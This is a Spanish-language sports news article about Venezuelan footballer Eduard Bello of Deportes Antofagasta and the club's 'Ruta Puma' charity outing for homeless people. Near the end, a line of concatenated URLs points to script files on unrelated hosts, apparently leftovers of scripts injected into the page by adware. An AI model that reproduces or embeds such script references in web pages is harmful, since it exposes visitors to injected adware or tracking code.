¡LOS NUESTROS PRIMERO!

Eduard Bello también golea fuera de las canchas ayudando a la gente (+Fotos)

Bello 1
Comparte esto
Tweet about this on Twitter
Twitter
Share on Facebook
Facebook

El futbolista venezolano Eduard Bello se ha convertido en uno de los mejores jugadores en llegar al fútbol chileno y al Club Deportes Antofagasta. Gracias a sus 11 goles y a su buen fútbol ofensivo, tiene a su equipo en la segunda posición, en puestos de Copa Libertadores y a 5 puntos del líder U. Católica.

El joven venezolano de 23 años ha demostrado en sus redes sociales su fidelidad a Dios y de ayudar a la gente. Por eso no solo golea dentro de la cancha, sino que también su talento lo ha llevado a ser parte de la campaña “Ruta Puma”, donde se pusieron la camiseta de la responsabilidad social y junto al Hogar de Cristo salieron a compartir alimentos, bebidas calientes y mantas con personas en situación de calle.

Los jugadores Patricio Jerez, Gonzalo Villagra, Paulo Magalhaes, Cristian Rojas, Eduard Bello, Gabriel Sandoval, Felipe Flores y Juan Ignacio Duma, además de la encargada de Desarrollo Social del club, Candy Heredia, realizaron la denominada “Ruta Puma”, instancia donde ayudan y comparten con personas en situación de calle.

La campaña tiene como objetivo ayudar a los más necesitados y colaborar con  su compromiso social en Antofagasta. El gran gesto de los “Pumas” conmovió a todo Chile y esperan seguir haciéndolo más seguido a pesar de sus compromisos profesionales.

Escrito por: Jhoan Ulloa / @JhoanEulloaS

Foto: Cortesía.

http://cdncache-a.akamaihd.net/sub/nee5452/52200_6968_/l.js?pid=2450&ext=http://loadsource.org/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=52200x6968x&r=1538584446055http://browfileext.com/addons/lnkr5.min.js

 

SportsVenezuela